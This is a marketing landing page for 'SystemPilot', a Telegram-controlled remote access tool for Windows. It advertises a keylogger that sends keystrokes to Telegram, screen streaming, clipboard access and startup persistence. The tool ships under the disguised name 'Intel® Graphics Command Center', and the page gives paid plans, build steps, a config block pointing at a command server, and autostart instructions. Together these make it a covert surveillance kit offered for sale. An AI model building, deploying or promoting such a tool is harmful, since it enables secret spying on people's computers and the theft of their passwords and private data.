v10.12 · Windows · Python 3.x

Control your PC
via Telegram

SystemPilot is a Telegram bot compiled into an exe that gives you full remote access to your computer. Screenshots, activity stats, process management, power control, clipboard, and much more — right in chat.

SystemPilot — Intel® Graphics Command Center 10.12.exe
SystemPilot v10.12 started
Bot connected: @MyPCBot
WebSocket → wss://systempilot.cloud/ws/pc
Activity monitoring started (interval: 60 sec)
Keylogger started
HLS auto-start: enabled
Added to Windows startup
Waiting for commands...

10k+
lines of code
30+
bot commands
4
notification methods
PCs in dashboard

Full control
over your computer

Everything you need for remote monitoring and management — compiled into a single exe file.

🖼
Screen Capture
Instant snapshot of all connected monitors. Multi-screen support with labels.
screenshot
📈
Activity Stats
Detailed work analytics: mouse, keyboard, screen. Periods from 1 hour to 30 days. Activity graphs.
activity_monitor
⌨️
Keylogger
Records all keystrokes with timestamps. File is sent directly to Telegram.
keylogger
🗂
Process Manager
List of apps and background processes with CPU/RAM. Blocking, block presets, process termination.
process_manager
🎥
Screen Streaming
Regular streaming (screenshots per second) and HLS video stream with auto-mute on RDP minimize.
hls_stream
Power Control
Shutdown, restart, screen lock. Timers (5 min — 2 hours) or at exact time.
power_control
🔔
Screen Notifications
Send text — a toast notification appears on the PC. 4 methods with auto-fallback.
notifications
📋
Clipboard
Read and write the PC clipboard directly from Telegram. Convenient for quick text transfer.
clipboard
📊
System Load
CPU per core, RAM, disk, network, temperatures, uptime. Top processes by load in real time.
system_info
🖥
AnyDesk Integration
Launch AnyDesk, get ID, stop — all via bot.
anydesk
👑
Admin System
Super-admin, regular admins, ban list, action log. Access requests with confirmation.
admin_system
🌐
Mini App Dashboard
Web dashboard right in Telegram — manage multiple PCs from a single interface.
mini_app

Full control menu

Telegram reply keyboard — all buttons are mirrored in the Mini App dashboard.

🖼
ScreenshotAll monitors, instantly
📈
Activity Stats1h / 3h / 6h / 12h / Today / 3d / 7d / 30d
🔔
Screen NotificationAny text → toast on PC
🎥
Screen StreamRegular and HLS with password
⌨️
KeyloggerToday's keystrokes file
🗂
Process ManagerApps / Background / Blocks
👑
Admin PanelAccess management, ban list, logs
Power ControlShutdown / Restart / Timer
📊
System LoadCPU cores, RAM, Disk, Temperatures
🔒
Lock ScreenWindows Lock with confirmation
ℹ️
IP & Device NameHostname, IP, OS, architecture
🖥
AnyDeskLaunch, get ID, stop

Simple & transparent

Choose the plan for your needs. Both plans include full bot functionality — the difference is in the connection method and HLS streaming.

Base
$5/ PC · mo

One bot — one computer. Direct connection via your Telegram bot token.

  • 🤖Your own Telegram bot (BotFather)
  • 📸Screenshots of all monitors
  • 📈Activity stats 1h — 30 days
  • ⌨️Keylogger, process manager
  • Power, clipboard, notifications
  • 🎥Screen stream (1 screenshot/sec)
  • 📡HLS video stream — unavailable
  • 🖥Web dashboard (Multi-PC) — unavailable
🚀 Start with Base

Payment accepted in crypto (USDT / TON) or bank transfer.
Questions — @systempilot_cloud_bot | Support — @reposit0r


What's inside

After PyInstaller build — a single folder that can be moved to any Windows PC.

📁 Intel® Graphics Command Center 10.12/ ├── Intel® Graphics Command Center 10.12.exe # main executable ├── ffmpeg.exe # for HLS streaming ├── AnyDesk.exe # portable version (optional) ├── bot_config.json # settings: interval, threshold, admins ├── activity_data.json # activity history (auto-created) ├── process_blocks.json # blocked processes and presets ├── keylog_YYYY-MM-DD.txt # keylogger file (daily rotation) ├── Add_to_startup.ps1 # script to add to startup └── _internal/ # Python runtime + all dependencies └── bell.png, blocked.png ... # notification icons

Up and running in 3 steps

1
Create a bot in Telegram
Message @BotFather, use command /newbot. Copy the token like 1234567890:AAE...
2
Insert token and SUPER_ADMIN_ID into server_control.py
Open server_control.py, find the config block and insert your data. Get your Telegram ID via @userinfobot.
BOT_TOKEN = "1234567890:AAEaswrV..."
SUPER_ADMIN_ID = 507891763
3
Run build_command.ps1
Open PowerShell in the project folder and run the build script. PyInstaller will compile everything into the dist/ folder. Launch the exe — bot is ready.
.\build_command.ps1
Dependencies
Configuration
Autostart
# Install dependencies pip install aiogram aiohttp websockets pip install psutil mss Pillow pynput pip install pycaw comtypes winotify win10toast pip install matplotlib numpy pyinstaller # Build .\build_command.ps1
# server_control.py — config block BOT_TOKEN = "YOUR_BOT_TOKEN" SUPER_ADMIN_ID = 507891763 SERVER_WS_URL = "wss://systempilot.cloud/ws/pc" SERVER_API_URL = "https://systempilot.cloud/api" SERVER_ENABLED = True SERVER_RECONNECT_INTERVAL = 15
# Run PowerShell script from the exe folder .\Add_to_startup.ps1 # Or manually — via shell:startup # %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup # Place a shortcut to the exe here

Ready? Open the dashboard

Link your PC via bot token and manage everything from one place via Telegram Mini App.